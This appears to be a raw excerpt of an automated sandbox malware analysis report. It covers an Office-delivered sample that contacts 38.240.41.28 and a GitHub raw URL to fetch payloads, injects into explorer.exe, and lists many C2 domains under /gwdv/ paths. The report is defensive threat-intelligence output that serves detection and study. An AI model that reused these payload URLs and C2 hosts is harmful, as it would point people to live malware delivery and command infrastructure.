Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
Source: global traffic TCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.my-tournament.live
Source: C:\Windows\explorer.exe Domain query: www.senior-dating-73474.bond
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.lefeetlab.net/gwdv/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/RCCRER.txt HTTP/1.1Host: 38.240.41.28Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.108.133 185.199.108.133
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TTSLMEIS-AS-APTTSL-ISPDIVISIONIN TTSLMEIS-AS-APTTSL-ISPDIVISIONIN
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /a080 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/wegivenewthingssoonsweetness.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown HTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: unknown TCP traffic detected without corresponding DNS query: 38.240.41.28
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2189D102.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /a080 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/wegivenewthingssoonsweetness.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /333/RCCRER.txt HTTP/1.1Host: 38.240.41.28Connection: Keep-Alive
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: m2g.me
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: www.my-tournament.live
Source: global traffic DNS traffic detected: DNS query: www.senior-dating-73474.bond
Source: powershell.exe, 0000000F.00000002.481286410.0000000002737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://38.240.41.28
Source: powershell.exe, 0000000F.00000002.481286410.0000000002737000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://38.240.41.28/333/RCCRER.txt
Source: EQNEDT32.EXE, EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000914000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000939000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000002.457404103.000000000097F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000003.456752146.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIF
Source: EQNEDT32.EXE, 0000000A.00000002.457404103.000000000097F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000003.456752146.000000000097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFC:
Source: EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000939000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFj
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsMR
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000F.00000002.481286410.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000C.00000002.501592598.0000000002340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.481286410.0000000002491000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.487220752.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/kursovaSQLDataSet.xsd
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.3dnu3uix.college
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.3dnu3uix.college/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.3dnu3uix.college/gwdv/www.nasocnite.xyz
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.3dnu3uix.collegeReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.accountingcourse06.shop
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.accountingcourse06.shop/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.accountingcourse06.shop/gwdv/www.highercall.net
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.accountingcourse06.shopReferer:
Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.blackwavetattoostudio.com
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.blackwavetattoostudio.com/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.blackwavetattoostudio.com/gwdv/www.spanish-classes-13883.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.blackwavetattoostudio.comReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.boyxlife.cyou
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.boyxlife.cyou/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.boyxlife.cyou/gwdv/www.blackwavetattoostudio.com
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.boyxlife.cyouReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dental-implants-84866.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dental-implants-84866.bond/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dental-implants-84866.bond/gwdv/www.boyxlife.cyou
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dental-implants-84866.bondReferer:
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.divineworks.store
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.divineworks.store/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.divineworks.store/gwdv/www.lingerie-16071.bond
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.divineworks.storeReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.highercall.net
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.highercall.net/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.highercall.net/gwdv/www.incronizid.dev
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.highercall.netReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.incronizid.dev
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.incronizid.dev/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.incronizid.dev/gwdv/www.lefeetlab.net
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.incronizid.devReferer:
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.intelliflow.run
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.intelliflow.run/gwdv/
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.intelliflow.run/gwdv/www.3dnu3uix.college
Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.intelliflow.runReferer:
